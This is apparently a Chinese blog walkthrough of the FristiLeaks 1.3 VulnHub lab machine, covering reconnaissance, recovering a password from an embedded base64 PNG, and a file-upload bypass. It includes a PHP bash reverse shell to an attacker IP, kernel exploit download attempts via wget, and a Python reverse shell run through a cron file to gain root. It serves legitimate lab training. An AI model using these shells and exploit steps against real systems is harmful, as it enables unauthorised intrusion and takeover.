FristiLeaks_1.3靶机练习
声明
B 站UP主泷羽sec
笔记的只是方便各位师傅学习知识,以下网站只涉及学习内容,其他的都与本人无关,切莫逾越法律红线,否则后果自负。
✍🏻作者简介:致力于网络安全领域,目前作为一名学习者,很荣幸成为一名分享者,最终目标是成为一名开拓者,很有趣也十分有意义
🤵♂️ 个人主页: @One_Blanks
欢迎评论 💬点赞👍🏻 收藏 📂加关注+
- 关注公众号:泷羽Sec-Blanks
X
带你去体验最真实的渗透环境,文章里不会直接摆答案,会全面的带你去进行信息收集以及漏洞利用,会领着你一步一步踩下我踩过的坑,实战往往比这更绝望,练技术须实践。
目录
靶机地址:
https://www.vulnhub.com/entry/fristileaks-13,133/
一、主机发现+信息收集
主机发现
arp-scan -l
靶机ip:192.168.25.226
环境变量设置
export ip=192.168.25.226
端口扫描
nmap --min-rate 10000 -p- $ip
PORT STATE SERVICE
80/tcp open http
只有80这一个端口在开放
服务信息扫描
nmap -sS -sV -O -p80 $ip
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|storage-misc|media device|webcam
Running (JUST GUESSING): Linux 2.6.X|3.X|4.X (97%), Drobo embedded (89%), Synology DiskStation Manager 5.X (89%), LG embedded (88%), Tandberg embedded (88%)
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/h:drobo:5n cpe:/a:synology:diskstation_manager:5.2
Aggressive OS guesses: Linux 2.6.32 - 3.10 (97%), Linux 2.6.32 - 3.13 (97%), Linux 2.6.39 (94%), Linux 2.6.32 - 3.5 (92%), Linux 3.2 (91%), Linux 3.2 - 3.16 (91%), Linux 3.2 - 3.8 (91%), Linux 2.6.32 (91%), Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.9 (91%)
默认脚本扫描
nmap --script=vuln -p80 $ip
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-trace: TRACE is enabled
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
| /robots.txt: Robots file
| /icons/: Potentially interesting folder w/ directory listing
|_ /images/: Potentially interesting folder w/ directory listing
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
二、开始渗透测试
访问web服务
静态页面但是下面的话是有一些信息的。
目录爆破
gobuster dir -u http://192.168.25.226/ -w /usr/share/dirbuster/wordlists/medium.txt
/images (Status: 301) [Size: 237] [--> http://192.168.25.226/images/]
/beer (Status: 301) [Size: 235] [--> http://192.168.25.226/beer/]
/cola (Status: 301) [Size: 235] [--> http://192.168.25.226/cola/]
指纹识别
whatweb http://192.168.25.226
http://192.168.25.226 [200 OK] Apache[2.2.15], Country[RESERVED][ZZ], HTTPServer[CentOS][Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3], IP[192.168.25.226], PHP[5.3.3], WebDAV[2]
http://192.168.25.226/sisi/
http://192.168.25.226/cola/
http://192.168.25.226/beer/
三张一模一样的图片
不是这个URL,那应该就是要让我们去找一个正确的URL
暴力寻找
cewl http://192.168.25.226 -w url.txt
我们这里直接使用cewl工具,这个工具会爬爬取网站单词并且组成字典
然后我们直接拿着这个字典到gobuster去扫描
这里我们直接找到了登录页面
http://192.168.25.226/fristi/
我们刚刚的信息
sisi
cola
beer
@meneer, @barrebas, @rikvduijn, @wez3forsec, @PyroBatNL, @0xDUDE, @annejanbrouwer, @Sander2121, Reinierk, @DearCharles, @miamat, MisterXE, BasB, Dwight, Egeltje, @pdersjant, @tcp130x10, @spierenburg, @ielmatani, @renepieters, Mystery guest, @EQ_uinix, @WhatSecurity, @mramsmeets, @Ar0xA
可以构造字典进行弱口令爆破
查看源码我们可以得到一些密文信息
We need to clean this up for production. I left some junk in here to make testing easier.
- by eezeepz
iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx
jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl
S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw
B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f
m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ
Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb
DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd
jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU
12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5
uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1
04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq
i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg
tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws
30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl
3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK
ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q
mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34
rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe
EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH
AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk
CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR
U5ErkJggg==
看着像是base64我们直接拿着去破解
格式不对,我们看第一行可以知道这是一个png文件我们将其改为png
mv base64.txt base64.png
我们会得到这样一图片
keKkeKKeKKeKkEkkEk
再加上前面的用户名eezeepz
我们可以尝试一下,登录成功
正常上传被拦了,查看指纹可以看到是个低版本的Apache,我们这样用多文件名绕过一下
成功上传,然后我们再到目录下查看
http://192.168.25.226/fristi/uploads/phpinfo.php.png
我们直接上传php马反弹shell
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.25.132/4444 0>&1'");?>
nc -nvlp 4444
记得在Kali中开启监听,然后我们上传并访问
http://192.168.25.226/fristi/uploads/php%E5%8F%8D%E5%BC%B9.php.png
三、获取初级权限
四、提权
id
uname -a
Linux 2.6.32
内核版本比较低,我们直接找EXp提权
searchsploit -t Linux 2.6.32 | grep Privile
Linux Kernel 2.6.32 < 3.x (CentOS 5/6) - ‘PERF_EVENTS’ Local Privilege Escalation (1) | linux/local/25444.c
我们用CentOS这个EXP进行提权
searchsploit -m 25444
python -m http.server 800
在攻击机上开启监听然后到shell中使用wget 将EXP下载下来
cd /tmp 目录中其他目录没有权限
wget 192.168.25.132:800/25444.c 下载命令
head -n 20 25444.c 查看使用说明
gcc -O2 25444.c && ./a.out 参数无效提权失败
我们换一个EXP
searchsploit -m 9844
wget 192.168.25.132:800/9844.py
python 9844.py 执行
执行失败
那继续信息收集
cd /home/eezeepz
ls -liah
cat notes.txt
Yo EZ,
I made it possible for you to do some automated checks,
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/
Don't forget to specify the full path for each binary!
Just put a file called "runthis" in /tmp/, each line one command. The
output goes to the file "cronresult" in /tmp/. It should
run every minute with my account privileges.
- Jerry
这里给了提示做了计划任务
这里我们写上一个文件然后让它执行反弹shell命令
import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.30.182",8421));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);
开启服务器wget下载
wget http://192.168.25.132/rc.py
echo ‘/usr/bin/python /tmp/rc.py’ > runthis
成功提权为Root
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
